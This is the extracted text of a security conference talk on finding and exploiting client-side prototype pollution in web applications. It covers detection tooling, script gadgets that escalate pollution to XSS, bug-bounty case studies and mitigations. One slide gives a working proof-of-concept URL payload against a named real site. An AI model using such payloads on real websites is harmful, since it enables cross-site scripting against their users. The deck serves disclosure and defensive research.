A tale of making internet pollution free Finding & Exploiting Client-Side Prototype Pollution in the Wild

Mohan SRK P ● I like browsers, electron and CTFs ● @s1r1u5_ ● Web and shit posting ● @rootxharsh Harsh Jaiswal

Agenda ● Javascript Prototype ● Prototype Pollution ● Methodology To Find & Exploit Prototype Pollution at Scale ● Case Studies & Results ● Ways To Mitigate Prototype Pollution ● Conclusion

Javascript Prototype

Javascript Prototype ● Javascript is an prototype based language ● Objects inherits properties and methods via prototype object. ● Object based inheritance is cool, but it has a security hole.

No content

No content

Prototype Pollution

Prototype Pollution ● Properties in Object.prototype are available to all the objects created in the application through prototype chain. ● If Object.prototype is tampered by the malicious user somehow then all the objects in the applications will have access to the tampered property.

No content

Passed query parameters → ?user=harsh
 
 Resulting query object → {“user”: “harsh”}
 


Passed query parameters → ?user[id]=1
 
 Resulting query object → {“user”: {“id”:1}}
 


Passed query parameters → ?user[id]=1&__proto__[foo]=bar
 
 Resulting query object → {“user”: {“id”:1}}
 
 Where did __proto__ go?


No content

Methodology To Find & Exploit Prototype Pollution at Scale

Methodology

Detection Selenium script/Nuclei Template - Initially, used this to find sites which has vulnerable location parsing either via query value or hash value in the URL. - Advantage: - Scalable - Disadvantage: - Only finds vulnerable location parsing - We can’t scan Authenticated Pages

No content

Detection Chrome Extension - To scan authenticated pages manually, we wrote an extension. - Advantage: Can scan Authenticated Pages. - Disadvantage: - Only finds vulnerable location parsing. - Not Scalable.

Detection Static Analysis Tool - To find all code components which leads to pollution we need to do static analysis. - Used CodeQL. - Advantage: Can find all sources and sinks which leads to prototype pollution. - Disadvantage: Not scalable.

Script Gadgets What is Script Gadget? A script gadget is a piece of code in the application which can be triggered via prototype pollution and can be used to upgrade prototype pollution to XSS.

Script Gadgets What is Script Gadget? A script gadget is a piece of code in the application which can be triggered via prototype pollution and can be used to upgrade prototype pollution to XSS. - Hard and Interesting part after detection. - Need to find the gadget most of the time. - If you are lucky, pollute.js and untrusted-types can quickly find one. - Idea: I think it can be automated with CodeQL

Identification of Lib

Scanning from DB

Case Study: Bug found using CodeQL ● Downloaded JS on top pages of Google, FB, and some private programs. ● Created a database with CodeQL. codeql database create --language=javascript --source-root database vulnerable_db / ● Run the Query on DB codeql query run --database=./vulnerable_db ../pp-automation/learn.ql

Case Study: Bug found using CodeQL

Case Study: Apple XSS using Chrome extension Rahul’s https://github.com/msrkp/PPScan

Case Study: Pollution found using python selenium bot. https://blog.swiftype.com/#__proto__[asdf]=alert(document.domain)

Results

Results ● Number of vulnerable libraries found: 18 ● Number of bugs reported to vulnerability disclosure programs: ~80 ● Total Bounties earned by ~10 people: ~ 40k

Mitigations

Mitigations ● Remove the vulnerable code ● Object.prototype freezing, Object sealing, or Object.create(null) is not enough ○ For how not to fix you should definitely check BlackFan’s talk and pugpug challenge in Bsides Ahmedabad CTF.

Conclusion

Conclusion ● New attack surface ● Feature proposal: Mitigation for Client-Side Prototype Pollution · Issue #33 · WICG/document-policy · GitHub

Research Team • Sergey Bobrov @Black2Fan • Mohan SRK P @S1r1u5_ • terjanq @terjanq • Beomjin Lee @po6ix • Masato Kinugawa @kinugawamasato • Rahul Maini @iamnoooob • Harsh Jaiswal @rootxharsh • Mikhail Egorov @0ang3el • Nikita Stupin @_nikitastupin

Thanks to other researchers • @_holyvier_ • @SecurityMB • @wcbowling • @corb3nik

Thanks

Questions?